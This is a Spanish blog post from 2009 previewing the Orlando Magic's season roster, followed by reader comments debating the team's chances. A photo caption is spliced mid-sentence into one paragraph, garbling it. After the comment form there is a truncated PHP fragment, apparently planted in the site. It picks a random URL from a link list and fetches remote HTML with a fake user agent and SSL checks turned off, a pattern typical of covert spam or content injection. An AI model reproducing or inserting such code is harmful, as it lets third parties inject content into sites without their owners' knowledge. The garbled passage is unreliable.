Orlando Magic: Llegar para quedarse

14 de October de 2009 por Viva_Dirk

Reza el dicho que lo difícil no es llegar sino mantenerse. Que ningún equipo del Este haya conseguido repetir título de conferencia durante los últimos 5 años le da la razón al dicho. Los Magic quieren romper esa racha y para ello no han escatimado en gastos: les han dado un buen dinero a Gortat, Bass, Barnes y ha llegado en un traspaso Vince Carter. Paralelamente han abandonado la franquicia 3 piezas importantes como Turkoglu, Alston y Lee.

En la posición de escolta veremos al gran refuerzo para esta campaña, Vince Carter que a sus 32 años llega por primera vez a un proyecto con aspiraciones reales al anillo. Por algún motivo se trata de un jugador ‘bajo sospecha’ pese a su tremendo rendimiento en todos los equipos en los que ha jugado. Sigue siendo capaz de jugar por encima del aro aun sin la potencia de antaño, ha perfeccionado su faceta de pasador, cada año es mejor tirador y no hay ninguna duda de que sabe meter los tiros calientes y de que todavía es capaz de defender. Es un repuesto de lujo para Turkoglu al que dudo mucho que echen tanto de menos como muchos aseguran. ¿Qué hubiera sido de aquel fatídico alley-hoop que marró Lee de haber caído en manos de Vicente? Sería casi temerario apostar en contra de que lo hubiera clavado para adentro… Quizás tengamos esta temporada otra oportunidad para salir de dudas.

Los 110 millones que le pagaron los Magics a Rashard Lewis por 6Forward Rashard Lewis #9 of the Orlando Magic takes a shot against Matt Bonner #15 of the San Antonio Spurs on January 11, 2009 at AT&T Center in San Antonio, Texas.  NOTE TO USER: User expressly acknowledges and agrees that, by downloading and/or using this Photograph, user is consenting to the terms and conditions of the Getty Images License Agreement.  (Photo by Ronald Martinez/Getty Images) *** Local Caption *** Rashard Lewis;Matt Lewis temporadas de contrato siguen pareciéndonos muchos, pero no cabe duda que haber logrado jugar una final de la NBA y estar en condiciones de pelear por todo bien vale un contrato sobrepagado. La marcha de Turkoglu y la llegada de jugadores interiores devolverá a Lewis de manera definitiva a la posición de alero, desde donde puede anotar en el poste bajo y tirar por encima de defensores mas pequeños que él aunque también sufrirá algo más en defensa. Los suplentes de las alas son Pietrus, buen defensor y cumplidor en ataque, y Barnes, que llega para completar un cuarteto de aleros envidiable, dejando menos minutos para JJ Redick y el recién llegado Morris Almond.

Jameer Nelson jugó el año pasado a un altísimo nivel hasta su lesión. Fruto de ese nivel Orlando estuvo disputando durante varias semanas el primer puesto de la conferencia y pasó a ser considerado el tercer ‘grande’ del Este. Van a necesitar al mejor Nelson para repetir éxito y no hay motivos aparentes para que baje su rendimiento. El suplente de Jameer es el veterano Anthony Johnson y han incorporado por si hiciera falta a Jason Williams tras un año retirado de las canchas.

Para la posición de ala-pívot han contratado los servicios de Brandon Bass, que ha jugado muy bien los 2 últimos años con los Mavs saliendo desde el banco. Bass es un jugador muy inteligente sobre la cancha, capaz de aprovechar cada ventaja que le proporcionan sus compañeros, con un gran tiro de media distancia y muy luchador en defensa. Otro forward perfecto para jugar junto a Dwight Howard es Ryan Anderson. El sophomore tiene un excelente muñeca desde la larga distancia a la vez que una infravalorada capacidad reboteadora.

Y en la posición de center, el alma del equipo. Dwight Howard es actualmente el mejor de la NBA en su posición, máximo reboteador y taponador de la liga la temporada pasada, lo que le valió el galardón de mejor jugador defensivo (y seguro que no será el último). Además mejoró de forma significativa sus porcentajes en tiros libres en los playoffs y si es capaz de acercarse a un 70% de acierto los equipos rivales perderán una forma de pararlo. Los 12 minutitos que deja Howard son para Marcin Gortat, que ha firmado un contrato de 34 millones y 5 temporadas por realizar ese trabajo. Como en el caso de Lewis nos parecen muchos, pero si les vale para repetir final no creo que nadie se queje.

Estos Magic disponen de un gran quinteto y un banquillo de buen nivel, banquillo que deberá gestionar Stan Van Gundy dejando a un lado las duras críticas que recibió durante la final contra los Lakers.

Quinteto: Nelson-Carter-Lewis-Bass-Howard

Sexto hombre: Pietrus

Pronóstico: Final de Conferencia, y como a Garnett se le ocurra volver a lesionarse, otra vez final de la NBA.

Comenta

16 comentarios a esta entrada

  1. pcerezo dice:
    #1

    Pronóstico: Final de Conferencia, y como a Garnett se le ocurra volver a lesionarse, otra vez final de la NBA.

    Viva_dirk, la última frase la suscribo al pié de la letra. Desde mi punto de vista la Final debería ser Orlando-Celtics y a la pelea.

    Un saludo,
    Pablo

      Citar

  2. M dice:
    #2

    Quizá no tengo muchos motivos puramente racionales para dudar de este equipo…pero algo me dice que este año no llegarán tan lejos, y que el cambio de Turkoglu por Carter si se notará para mal. Me parece que han perdido un poco de consistencia, y que el “factor sorpresa” que pudieron hacer valer ante rivales que se relajaron un poco ante ellos esta vez no se producirá. Pero a digo, es más una sensación que un razonamiento.

      Citar

  3. TheDeerHunter dice:
    #3

    Se habla mucho de lo importante que era Turkoglu en el esquema de Orlando (y lo era)
    Me pregunto sin embargo cuanta gente cree realmente que el turco es mejor que Vince Carter (hasta hace bien poco tan sólo plantear la duda hubiera sido ridículo) y también dudo si afectaba positiva o negativamente al juego de Rashard Lewis y Nelson. Me inclino por lo segundo.

    Para mí tienen un equipo a años luz del pasado… y el del año pasado era la leche. Añado que me parece que tienen bastante mejor plantilla que Boston, aunque quizás el quinteto de los Celtics pueda ser superior (y que desde luego en el duelo de técnicos para mí no hay punto de comparación)

      Citar

  4. sergio dice:
    #4

    A pesar de que no tengo ningun motivo para dudar del potencial del equipo creo que quizas ni lleguen a la final de Conferencia. Veo muy importante quedar primero del Este en la regular para ahorrarse esfuerzos en las semis.

    No confio por un tema de feeling (que diria Guardiola) que viene de las dudas que me crea Dwight Howard frente a grandes defensores como Garnett o Duncan (mira Gasol en las Finales). y en cuanto a juego exterior… pues entre Fisher-Bryant-Garnett, Rondo-Allen-Pierce,Parker-Ginobili-Jefferson. Kidd-Terry-Marion y M.Williams-A.Parker-James no se si es realmente mejor que cualquiera de ellos… Es que Lewis lo veo muy beneficiado de las ayudas a Howard… que se van disminuyendo cuando en Playoffs lo cubre alguien de su… “potencial” (por cierto que esta lesionado…. alguien sabe ¿de que y hasta cuando???) Y tambien tendremos que verlo jugando de 3, donde creo que pierde ciertas ventajas en cuanto a velocidad. ¿O es que alguien se lo imagina defendiendo a Bryant, James o Pierce?? Creo que el factor Nelson es importante teniendo en cuenta que de los bases actuales del resto de aspirantes solo veo a Rondo parandolo.

      Citar

  5. sergio dice:
    #5

    Por cierto… buenos partidos hoy de Sheed, Arenas y Brand…. No, si al final van a volver todos esos que creiamos perdidos…

    Y Orlando en 63% en triples y 60% de campo… todo por llevarme la contraria ¬¬

      Citar

  6. Uno cualquiera dice:
    #6

    Sergio, ya les gustaria a los Lakers tener a Garnett… xD

    Supongo que te referirías a Artest.

    PD: genial blog y geniales artículos.

      Citar

  7. dice:
    #7

    Para mí tienen el mejor quinteto inicial de la NBA.

    Y además una plantilla bien compensada, con varios jugadores que defienden agresivo, pero algo no me termina de convencer en estos Magic. Pero el mero hecho de ver a Stan Van Gundy “jugar” con la plantilla que tiene, les da derecho a soñar con todo.

      Citar

  8. sergio dice:
    #8

    si…. ultimamente no se ni lo q digo…ayer hablando de Spurs en Conferencia Este… hoy de Garnett de alero de los Lakers… una pena de tio oye xD

    eso del mejor quinteto de la liga…. uff… Celtics, Lakers y Spurs creo que lo tienen algo mejor

      Citar

  9. Kiki dice:
    #9

    Creo que Orlando sale peridendo con los cambios. La baja de Turkoglu es demasiado importante, sobre todo cuando lleguen los Playoff, como se vió esta última temporada. Carter cumplirá, pero no creo que fuese lo que necesitaban para seguir creciendo. Y perder a cambio a un diamante como Courtney Lee, parece un gesto deseperado de “ahora o nunca”… No sé. Sí me parecen muy acertados los fichajes de Bass y Barnes y veremos qué tal le va a Jason Williams…
    Y el cinco titular, igual es Nelson-Pietrus-Carter-Lewis-Howard, veremos. Con este equipo y Lewis de “4” abierto, Carter y Pietrus tendrán espacio para penetrar, como les gusta.

      Citar

  10. CAMPO2 dice:
    #10

    Teniendo en cuenta que VINSANITY es mi jugador favorito, creo que ya se merecia tener una gran al titulo, los refuerzos creo que han sido extraordinarios para las bajas que ha tenido, y creo que hicieron bien en mantener a “Mortadelo” Gortat como recambio de Howard, creo que jugara Bass de titular y Lewis sera el 3, aunque me imagino que dependera de contra quien jueguen SVG optara por una opcion u otra.

    Experiencia en cuanto a grandes citas tienen y salud tambien por lo que les doy minimo finalistas de conferencia.

      Citar

  11. Jabho dice:
    #11

    A mi por feeling tampoco los veo… Osea, si lo harán bien y son el tercero en discordia en el Oeste. y además les veo capaces como el año pasado de ganar una eliminatoria a Cavs o Celtics, pero hacer unos PO enteros a gran nivel para ganar el anillo no sé…

    En cuanto a Carter es mejor que Turcoglu, pero el turco hace jugar mucho. Dependerá un poco de Nelson que le echen de menos o no tanto. A priori si son mejor equipo que el año pasado, pero creo que caeran en 2ª ronda de PO ante Cavs o C´s

      Citar

  12. Viva_Dirk dice:
    #12

    Es que Carter da mas asistencias que Trukoglu….

      Citar

  13. CAMPO2 dice:
    #13

    es que Carter es muy bueno

      Citar

  14. sergio dice:
    #14

    A quien no le gusta Carter desde que salto a Weis? Carter is different…. te hace un mate en toda la cara y luego te pone cara de buena gente ( o quizas se ria de ellos porque les ha puesto los “eggs on the morrow”

      Citar

  15. dice:
    #15

    Nelson; Carter; Lewis y Howard pueden ser tranquilamente All-Star´s.

    Y Pietrus o Bass, ¿quién no querría tenerlos en su equipo?

      Citar

  16. sergio dice:
    #16

    pueden no…. han sido vaya xD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>